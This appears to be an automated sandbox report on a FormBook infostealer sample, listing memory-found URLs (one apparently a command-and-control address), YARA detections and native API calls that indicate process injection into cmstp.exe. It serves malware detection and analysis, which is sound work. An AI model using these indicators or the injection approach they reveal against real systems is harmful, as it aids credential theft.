          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 09:10:22 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
          Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://www.physicalrobot.com
          Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpString found in binary or memory: http://www.physicalrobot.com/
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00418272 NtReadFile,1_2_00418272
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AB98F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AB9860
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,1_2_00AB9840
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,1_2_00AB99A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AB9910
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,1_2_00AB9A20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AB9A00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,1_2_00AB9A50
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,1_2_00AB95D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,1_2_00AB9540
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AB96E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AB9660
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AB97A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AB9780
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AB9FE0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AB9710
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB98A0 NtWriteVirtualMemory,1_2_00AB98A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9820 NtEnumerateKey,1_2_00AB9820
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABB040 NtSuspendThread,1_2_00ABB040
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB99D0 NtCreateProcessEx,1_2_00AB99D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9950 NtQueueApcThread,1_2_00AB9950
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A80 NtOpenDirectoryObject,1_2_00AB9A80
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9A10 NtQuerySection,1_2_00AB9A10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA3B0 NtGetContextThread,1_2_00ABA3B0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9B00 NtSetValueKey,1_2_00AB9B00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB95F0 NtQueryInformationFile,1_2_00AB95F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9520 NtWaitForSingleObject,1_2_00AB9520
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABAD30 NtSetContextThread,1_2_00ABAD30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9560 NtWriteFile,1_2_00AB9560
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB96D0 NtCreateKey,1_2_00AB96D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9610 NtEnumerateValueKey,1_2_00AB9610
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9670 NtQueryInformationProcess,1_2_00AB9670
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9650 NtQueryValueKey,1_2_00AB9650
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9730 NtQueryVirtualMemory,1_2_00AB9730
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA710 NtOpenProcessToken,1_2_00ABA710
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9760 NtOpenProcess,1_2_00AB9760
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB9770 NtSetInformationFile,1_2_00AB9770
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ABA770 NtOpenThread,1_2_00ABA770
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00418272 NtReadFile,1_1_00418272
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629540 NtReadFile,LdrInitializeThunk,4_2_04629540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046295D0 NtClose,LdrInitializeThunk,4_2_046295D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04629660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk,4_2_04629650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_046296E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk,4_2_046296D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk,4_2_04629710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk,4_2_04629FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk,4_2_04629780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04629860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk,4_2_04629840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04629910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk,4_2_046299A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk,4_2_04629A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629560 NtWriteFile,4_2_04629560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629520 NtWaitForSingleObject,4_2_04629520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462AD30 NtSetContextThread,4_2_0462AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046295F0 NtQueryInformationFile,4_2_046295F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629670 NtQueryInformationProcess,4_2_04629670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629610 NtEnumerateValueKey,4_2_04629610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629760 NtOpenProcess,4_2_04629760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A770 NtOpenThread,4_2_0462A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629770 NtSetInformationFile,4_2_04629770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629730 NtQueryVirtualMemory,4_2_04629730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A710 NtOpenProcessToken,4_2_0462A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046297A0 NtUnmapViewOfSection,4_2_046297A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462B040 NtSuspendThread,4_2_0462B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629820 NtEnumerateKey,4_2_04629820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046298F0 NtReadVirtualMemory,4_2_046298F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046298A0 NtWriteVirtualMemory,4_2_046298A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629950 NtQueueApcThread,4_2_04629950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046299D0 NtCreateProcessEx,4_2_046299D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A20 NtResumeThread,4_2_04629A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A00 NtProtectVirtualMemory,4_2_04629A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A10 NtQuerySection,4_2_04629A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629A80 NtOpenDirectoryObject,4_2_04629A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04629B00 NtSetValueKey,4_2_04629B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462A3B0 NtGetContextThread,4_2_0462A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004181C0 NtCreateFile,4_2_004181C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00418270 NtReadFile,4_2_00418270
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004182F0 NtClose,4_2_004182F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,4_2_004183A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00418272 NtReadFile,4_2_00418272
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00408C5B1_2_00408C5B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B5691_2_0041B569
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041BD6A1_2_0041BD6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041CEAF1_2_0041CEAF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B7B51_2_0041B7B5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A01_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B420A81_2_00B420A8
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B0901_2_00A8B090
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B428EC1_2_00B428EC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4E8241_2_00B4E824
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B310021_2_00B31002
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A941201_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7F9001_2_00A7F900
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B422AE1_2_00B422AE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAEBB01_2_00AAEBB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3DBD21_2_00B3DBD2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B303DA1_2_00B303DA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42B281_2_00B42B28
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8841F1_2_00A8841F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3D4661_2_00B3D466
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA25811_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E01_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B425DD1_2_00B425DD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A70D201_2_00A70D20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42D071_2_00B42D07
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41D551_2_00B41D55
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B42EF71_2_00B42EF7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A96E301_2_00A96E30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3D6161_2_00B3D616
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41FF11_2_00B41FF1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4DFCE1_2_00B4DFCE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00408C5B1_1_00408C5B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00408C601_1_00408C60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B5691_1_0041B569
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041BD6A1_1_0041BD6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00402D871_1_00402D87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AD4664_2_046AD466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F841F4_2_045F841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1D554_2_046B1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2D074_2_046B2D07
